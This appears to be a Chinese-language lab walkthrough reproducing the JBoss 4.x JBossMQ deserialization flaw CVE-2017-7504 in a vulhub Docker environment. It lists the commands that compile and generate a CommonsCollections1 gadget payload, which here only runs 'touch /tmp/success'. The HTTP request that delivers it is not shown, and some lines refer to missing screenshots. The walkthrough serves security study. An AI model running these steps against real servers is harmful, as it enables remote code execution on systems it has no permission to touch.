JBoss4.xJBossMQJMS反序列化漏洞(CVE-2017-7504)简介
Red Hat JBoss Application Server 是⼀款基于JavaEE的开源应⽤服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。
环境搭建
使⽤vulhub和docker快速搭建环境
cd vulhub/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
这⾥我们使⽤⼯具
我们选择⼀个Gadget:ExampleCommonsCollections1WithHashMap,编译并⽣成序列化数据:
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
我们执⾏的命令是touch /tmp/success。执⾏完成后,将⽣成⼀个⽂件ExampleCommonsCollections1WithHashMap.ser,将该⽂件作为body发送如下数据包:
cve漏洞库虽然提⽰警告,但是我只关注错误,忽略不计
进⼊镜像
docker exec -it 3f77814c9a45 /bin/bash

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。